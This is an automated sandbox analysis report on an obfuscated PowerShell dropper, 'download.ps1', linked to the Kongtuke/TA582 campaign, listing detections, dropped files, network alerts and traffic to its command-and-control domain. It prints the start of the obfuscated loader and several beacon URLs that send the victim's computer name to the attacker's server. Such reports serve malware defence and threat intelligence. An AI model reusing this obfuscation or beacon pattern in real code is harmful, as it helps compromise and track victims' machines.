SourceDetectionScannerLabelLink
download.ps113%VirustotalBrowse
download.ps116%ReversingLabsScript-PowerShell.Trojan.Kongtuke
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.217.164
truefalse
    high
    cmacnnkfbhlcncm.top
    45.61.136.138
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
        high
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0powershell.exe, 00000002.00000002.663090479972.0000021A37020000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.663075653155.0000021A2EAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaApowershell.exe, 00000002.00000002.663053799764.0000021A1F877000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000002.00000002.663053799764.0000021A1F862000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://crl.micpowershell.exe, 00000002.00000002.663087374251.0000021A36BB0000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://contoso.com/Iconpowershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.microsoOpowershell.exe, 00000002.00000002.663088206745.0000021A36D26000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://cmacnnkfbhlcncm.toppowershell.exe, 00000002.00000002.663053799764.0000021A1F858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F7D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://$o91mkbr7ed3vtf6/$32nxepuvb0gay75.php?id=$env:computername&key=$xcdjnwvua&s=527powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVpowershell.exe, 00000002.00000002.663053799764.0000021A1F862000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/recaptcha/api.jspowershell.exe, 00000002.00000002.663053799764.0000021A1F858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F877000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F889000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://contoso.com/powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.663075653155.0000021A2EAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.google.compowershell.exe, 00000002.00000002.663053799764.0000021A1F858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F877000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/Pester/PesterXzpowershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.663053799764.0000021A1E931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://$o91mkbr7ed3vtf6/$32nxepuvb0gay75.php?powershell.exe, 00000002.00000002.663053799764.0000021A1F9F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1FB96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1FA66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.663053799764.0000021A1E931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              142.250.217.164
                                                              www.google.comUnited States
                                                              15169GOOGLEUSfalse
                                                              45.61.136.138
                                                              cmacnnkfbhlcncm.topUnited States
                                                              40676AS40676USfalse
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1579458
                                                              Start date and time:2024-12-22 13:46:06 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 6m 3s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                              Run name:Suspected VM Detection
                                                              Number of analysed new started processes analysed:7
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:download.ps1
                                                              Detection:MAL
                                                              Classification:mal72.evad.winPS1@2/7@2/2
                                                              EGA Information:Failed
                                                              HCA Information:
                                                              • Successful, ratio: 93%
                                                              • Number of executed functions: 12
                                                              • Number of non-executed functions: 1
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .ps1
                                                              • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 52.111.227.13, 20.190.157.14
                                                              • Excluded domains from analysis (whitelisted): assets.msn.com, login.live.com, ctldl.windowsupdate.com, nexusrules.officeapps.live.com, api.msn.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 6916 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              TimeTypeDescription
                                                              07:48:10API Interceptor30x Sleep call for process: powershell.exe modified
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/lbs39er51ghtr.php?id=computer&key=31400257058&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              cmacnnkfbhlcncm.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                              • 107.160.112.122
                                                              QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                              • 107.160.131.254
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              No context
                                                              No context
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1940658735648508
                                                              Encrypted:false
                                                              SSDEEP:3:Nlllulwnxj:NllUSx
                                                              MD5:56D8320D702FE6600E82F4E99701A1E9
                                                              SHA1:874CC256AD8866BCC4F2880ED90E10D047E8481A
                                                              SHA-256:967E51C12B40746E26C9DDE76DDA42228833A07BB7E678E56718182D0ED5F463
                                                              SHA-512:5D0FA9AB700F148FD5CF24F9EC4754A64A9D0944211B8F2A38D60FC3E391F511898D382274E82BA9A83DCCFCA09C743260073C7D411194EF0458C3DD09F7C050
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:@...e................................................@..........
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6222
                                                              Entropy (8bit):3.7334568041069924
                                                              Encrypted:false
                                                              SSDEEP:48:qUKNePPCZtU2jCkukvhkvklCywuSDHgWxxh+SogZoX8AjHgWxxh+SogZoXpA:JKEPCcQ6kvhkvCCtdHgWx/H72HgWx/HP
                                                              MD5:95CA2B0F6561E54ECBE6AB15D76AC45F
                                                              SHA1:9CE5510288181DA96FB30E760D9957A4C41861AE
                                                              SHA-256:FCA10125BC4B356A91183944D6AD924687539ADAB0FDD7F2FEA5393D43802CB1
                                                              SHA-512:2BBF8FB527194193A37E9566B3F0FD1EF1655F78F8E53F3AD7ACFDFD74132647926419D80A3704DAF8193FC2337E601D1247A628C9B1039B52F5C84930B3D20D
                                                              Malicious:false
                                                              Preview:...................................FL..................F.".. ......A....?...oT..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A.....)`.oT......oT......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<.Y.e.............................A.p.p.D.a.t.a...B.V.1......Y.f..Roaming.@......&W.<.Y.f..........................&...R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<.Y.e...........................RN.M.i.c.r.o.s.o.f.t.....V.1......Y.5..Windows.@......&W.<.Y.e...........................$..W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<.Y.d....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<.Y.d....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<.Y.b..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<.Y.f....8...........
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6222
                                                              Entropy (8bit):3.7334568041069924
                                                              Encrypted:false
                                                              SSDEEP:48:qUKNePPCZtU2jCkukvhkvklCywuSDHgWxxh+SogZoX8AjHgWxxh+SogZoXpA:JKEPCcQ6kvhkvCCtdHgWx/H72HgWx/HP
                                                              MD5:95CA2B0F6561E54ECBE6AB15D76AC45F
                                                              SHA1:9CE5510288181DA96FB30E760D9957A4C41861AE
                                                              SHA-256:FCA10125BC4B356A91183944D6AD924687539ADAB0FDD7F2FEA5393D43802CB1
                                                              SHA-512:2BBF8FB527194193A37E9566B3F0FD1EF1655F78F8E53F3AD7ACFDFD74132647926419D80A3704DAF8193FC2337E601D1247A628C9B1039B52F5C84930B3D20D
                                                              Malicious:false
                                                              Preview:...................................FL..................F.".. ......A....?...oT..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A.....)`.oT......oT......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<.Y.e.............................A.p.p.D.a.t.a...B.V.1......Y.f..Roaming.@......&W.<.Y.f..........................&...R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<.Y.e...........................RN.M.i.c.r.o.s.o.f.t.....V.1......Y.5..Windows.@......&W.<.Y.e...........................$..W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<.Y.d....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<.Y.d....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<.Y.b..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<.Y.f....8...........
                                                              File type:ASCII text, with very long lines (10346), with CRLF line terminators
                                                              Entropy (8bit):5.95792959910712
                                                              TrID:
                                                                File name:download.ps1
                                                                File size:19'771 bytes
                                                                MD5:e8dd1c8a9dc723dd3efb012b52d487a8
                                                                SHA1:1d59b6fda15b8d29ddf665b5fc4abf715b6f0186
                                                                SHA256:96d6d2f4e613ae1d987e3f1eb72237fa1308e336e06cffdd865f0a124346a474
                                                                SHA512:915a86c00c14588f866b8c7bbe3d246df30792519aefd3f86b224746179f6adab8c2853802d8035c8c5b586e7b6472c5267d8aa25602068a3492b496935f4670
                                                                SSDEEP:384:PjSrjeulHp/ROD6eel2gYAthuqBGkZbvIMqT0CA0GXPQ1WpbTXiWdz5+fOA:Pj4VtO+lNUq7CLGfuObTSWJ5+fh
                                                                TLSH:84928DC2B784F9D186CA821F9D06AD193F7639AED4A7BCC4F19CC6C613511489E5ACC2
                                                                File Content Preview:$xqsinb=$executioncontext;$isaloristionatenesonbebeortionbe = ([CHAr[]]@((-3399+3452),(9666-9614),(456114/8002),(151550/3031),(7889-(3172365/(3776220/(18961-(11018-1381))))),(95202/1763),(-1720+(6420-4644)),(-7304+7359),(515845/9379),(-323+(-9117+(18511-(
                                                                Icon Hash:3270d6baae77db44
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-12-22T13:48:12.520278+01002859391ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.11.30600511.1.1.153UDP
                                                                2024-12-22T13:48:14.348468+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304986323.50.113.178443TCP
                                                                2024-12-22T13:49:30.199477+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304986623.50.113.178443TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 22, 2024 13:48:12.882278919 CET4986180192.168.11.3045.61.136.138
                                                                Dec 22, 2024 13:48:13.074908972 CET804986145.61.136.138192.168.11.30
                                                                Dec 22, 2024 13:48:13.075087070 CET4986180192.168.11.3045.61.136.138
                                                                Dec 22, 2024 13:48:13.080123901 CET4986180192.168.11.3045.61.136.138
                                                                Dec 22, 2024 13:48:13.272211075 CET804986145.61.136.138192.168.11.30
                                                                Dec 22, 2024 13:48:13.315535069 CET804986145.61.136.138192.168.11.30
                                                                Dec 22, 2024 13:48:13.367728949 CET4986180192.168.11.3045.61.136.138
                                                                Dec 22, 2024 13:48:13.450985909 CET4986280192.168.11.30142.250.217.164
                                                                Dec 22, 2024 13:48:13.580092907 CET8049862142.250.217.164192.168.11.30
                                                                Dec 22, 2024 13:48:13.580271006 CET4986280192.168.11.30142.250.217.164
                                                                Dec 22, 2024 13:48:13.580421925 CET4986280192.168.11.30142.250.217.164
                                                                Dec 22, 2024 13:48:13.709615946 CET8049862142.250.217.164192.168.11.30
                                                                Dec 22, 2024 13:48:14.087275982 CET8049862142.250.217.164192.168.11.30
                                                                Dec 22, 2024 13:48:14.087295055 CET8049862142.250.217.164192.168.11.30
                                                                Dec 22, 2024 13:48:14.087644100 CET4986280192.168.11.30142.250.217.164
                                                                Dec 22, 2024 13:48:14.090585947 CET4986280192.168.11.30142.250.217.164
                                                                Dec 22, 2024 13:48:14.219769955 CET8049862142.250.217.164192.168.11.30
                                                                Dec 22, 2024 13:48:14.233804941 CET8049862142.250.217.164192.168.11.30
                                                                Dec 22, 2024 13:48:14.233825922 CET8049862142.250.217.164192.168.11.30
                                                                Dec 22, 2024 13:48:14.233840942 CET8049862142.250.217.164192.168.11.30
                                                                Dec 22, 2024 13:48:14.233944893 CET4986280192.168.11.30142.250.217.164
                                                                Dec 22, 2024 13:48:14.380475998 CET4986180192.168.11.3045.61.136.138
                                                                Dec 22, 2024 13:48:14.380506992 CET4986280192.168.11.30142.250.217.164
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 22, 2024 13:48:12.520277977 CET6005153192.168.11.301.1.1.1
                                                                Dec 22, 2024 13:48:12.867929935 CET53600511.1.1.1192.168.11.30
                                                                Dec 22, 2024 13:48:13.320194006 CET6257253192.168.11.301.1.1.1
                                                                Dec 22, 2024 13:48:13.449281931 CET53625721.1.1.1192.168.11.30
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 22, 2024 13:48:12.520277977 CET192.168.11.301.1.1.10xc090Standard query (0)cmacnnkfbhlcncm.topA (IP address)IN (0x0001)false
                                                                Dec 22, 2024 13:48:13.320194006 CET192.168.11.301.1.1.10x533cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 22, 2024 13:48:12.867929935 CET1.1.1.1192.168.11.300xc090No error (0)cmacnnkfbhlcncm.top45.61.136.138A (IP address)IN (0x0001)false
                                                                Dec 22, 2024 13:48:13.449281931 CET1.1.1.1192.168.11.300x533cNo error (0)www.google.com142.250.217.164A (IP address)IN (0x0001)false
                                                                • cmacnnkfbhlcncm.top
                                                                • www.google.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.11.304986145.61.136.138806916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 22, 2024 13:48:13.080123901 CET215OUTGET /mes6v8wj5phtr.php?id=computer&key=28342894733&s=527 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                Host: cmacnnkfbhlcncm.top
                                                                Connection: Keep-Alive
                                                                Dec 22, 2024 13:48:13.315535069 CET166INHTTP/1.1 302 Found
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Sun, 22 Dec 2024 12:48:13 GMT
                                                                Content-Length: 0
                                                                Connection: keep-alive
                                                                Location: http://www.google.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.11.3049862142.250.217.164806916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 22, 2024 13:48:13.580421925 CET159OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                Host: www.google.com
                                                                Connection: Keep-Alive
                                                                Dec 22, 2024 13:48:14.087275982 CET1289INHTTP/1.1 302 Found
                                                                Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                x-hallmonitor-challenge: CgsIjpWguwYQk8n4BRIEZoGYzQ
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-_j0ewQ8-mzJuiyu4q5AQOg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                Date: Sun, 22 Dec 2024 12:48:14 GMT
                                                                Server: gws
                                                                Content-Length: 396
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                Set-Cookie: AEC=AZ6Zc-WDLmv3qJ_sn73xj5sJ7KWbwprAHtOQdTmSztb88gBg2qYJzR-zka0; expires=Fri, 20-Jun-2025 12:48:14 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                Set-Cookie: NID=520=R06Okk43pnG38XsvEyzgB83qthqG2UUmOxWqGdorYa9lglds2TA-1tpHAbBY52hGQ_9c6KFN-ZAJv6x-gG9kxwmZdrrPUluwxFNVgQTU8AlsMoc6ZxZc6GUGZWuFdDktmRPCtVfvWJBDQQpI_30dcxrBY1jy-RZBTDGbohYWF3ugPnE4XhJjBb9V4AAR2ekGbbVS; expires=Mon, 23-Jun-2025 12:48:13 GMT; path=/; domain=.google.com; HttpOnly
                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d
                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/htm
                                                                Dec 22, 2024 13:48:14.087295055 CET335INData Raw: 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63
                                                                Data Ascii: l;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://www.google.com/sorry/index?continue=http://www.google.com/&amp;q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl
                                                                Dec 22, 2024 13:48:14.090585947 CET522OUTGET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                Host: www.google.com
